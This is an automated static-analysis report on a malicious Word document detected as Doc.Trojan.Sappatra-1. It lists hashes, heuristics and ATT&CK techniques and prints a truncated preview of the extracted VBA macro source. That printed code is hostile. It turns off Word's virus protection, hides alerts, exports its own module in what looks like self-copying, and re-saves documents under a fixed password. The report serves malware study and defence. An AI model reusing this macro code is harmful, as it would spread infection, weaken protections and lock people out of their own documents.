Doc.Trojan.Sappatra-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 7fe3c72986f87412…

MALICIOUS

Office (OLE)

34.5 KB Created: 2006-01-10 15:46:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: fd4e3a23f912e9f737d68cb63e4bd7a3 SHA-1: 2ebe9091339c72f18a8376e325ca0ccd669fcba4 SHA-256: 7fe3c72986f87412a1797e5c7411cd2c458eba9b641f931daa3420fa653eb438
140 Risk Score

Malware Insights

Doc.Trojan.Sappatra-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Trojan.Sappatra-1. It contains a legacy WordBasic AutoOpen macro, indicated by the OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic, which is designed to execute automatically. The VBA macro code, while truncated, appears to be involved in removing specific modules and checking directories, suggesting it's part of a larger malicious execution chain. The presence of the AutoOpen macro strongly suggests it was delivered as a spearphishing attachment.

Heuristics 4

  • ClamAV: Doc.Trojan.Sappatra-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Sappatra-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5508 bytes
SHA-256: ecc6611801e8c79b0e1a6e305e74ea8a8af1bee602e61496766f45f2c784786f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Sapattra"
Sub removeA4()
    Dim signature, index, eol, cmt
    Dim sf As Boolean
    Dim dm
    
    
    On Error Resume Next
    
    signature = "ModuleA4"
    sf = False
    index = 0
    eol = 0
    
    
    If Application.Documents.Count < 1 Then
      Exit Sub
    End If
    
    ccount = Word.ActiveDocument.VBProject.VBComponents.Count
        For i% = 1 To ccount
           mm$ = Word.ActiveDocument.VBProject.VBComponents.Item(i%).Name
           If Trim(mm$) = signature Then
              sf = True
              index = i%
           End If
        Next i%
    
    If sf Then
        eol = Word.ActiveDocument.VBProject.VBComponents.Item(index).CodeModule.CountOfLines
        Word.ActiveDocument.VBProject.VBComponents.Item(index).CodeModule.DeleteLines 1, eol
        sf = False
    End If
    
    ccount = Word.NormalTemplate.VBProject.VBComponents.Count
        For i% = 1 To ccount
           mm$ = Word.NormalTemplate.VBProject.VBComponents.Item(i%).Name
           If Trim(mm$) = signature Then
              sf = True
              index = i%
           End If
        Next i%
    
    If sf Then
        eol = Word.NormalTemplate.VBProject.VBComponents.Item(index).CodeModule.CountOfLines
        Word.NormalTemplate.VBProject.VBComponents.Item(index).CodeModule.DeleteLines 1, eol
        sf = False
    End If
    

End Sub
Sub checkDIR()
    Dim MyFile, MyPath, MyName
       MyPath = "c:\msoffice"
    MyName = Dir(MyPath, vbDirectory)
    If MyName = "" Then
      MkDir "c:\msoffice"
    End If
    
End Sub

Sub doSAVE()
    Dim no_of_docs, file1
    Dim myDate, myTime
    
    On Error Resume Next
    
    no_of_docs = Application.Documents.Count
    
    
    
    
    If no_of_docs < 1 Then Exit Sub
    
    myDate = Date
    myTime = Time
    
    
    
    s1 = Trim(Format(myDate, "dd-mmm-yyyy"))
    s2 = Trim(Format(myTime, "hh-mm-ss AMPM"))
    
    file1 = s1 + "(" + s2 + ")"
    
    checkDIR
    
    path1 = "c:\msoffice\" + file1 + ".doc"
  
  
    ActiveDocument.SaveAs FileName:=path1, FileFormat:=wdFormatDocument, _
        LockComments:=False, Password:="sapattra", AddToRecentFiles:=True, WritePassword _
        :="", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:=False, _
        SaveNativePictureFormat:=False, SaveFormsData:=False, SaveAsAOCELetter:= _
        False
    
  

    
     
End Sub


Function checkSIGN(location As Boolean)
    Dim mfile, ccount, index
    Dim signflag As Boolean
    Dim sigunature As String
     
      
      
    On Error Resume Next
    
    Application.DisplayAlerts = wdAlertsNone
    Application.ScreenUpdating = False
    Application.EnableCancelKey = wdCancelInterrupt
    
    Options.VirusProtection = False
    
    mfile = "c:\win32dll.drv"
  
       
    signature = "Sapattra"
    signflag = False
    index = 0
    
    
    If Application.Documents.Count < 1 Then
      checkSIGN = index
      Exit Function
    End If
    
    If (location) Then
        ccount = Word.ActiveDocument.VBProject.VBComponents.Count
        For i% = 1 To ccount
           mm$ = Word.ActiveDocument.VBProject.VBComponents.Item(i%).Name
           If Trim(mm$) = signature Then
              signflag = True
              index = i%
              Word.ActiveDocument.VBProject.VBComponents.Item(index).Export mfile
           End If
        Next i%
    Else
        ccount = Word.NormalTemplate.VBProject.VBComponents.Count
        For i% = 1 To ccount
           mm$ = Word.NormalTemplate.VBProject.VBComponents.Item(i%).Name
           If Trim(mm$) = signature Then
              signflag = True
              index = i%
              Word.Normal
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.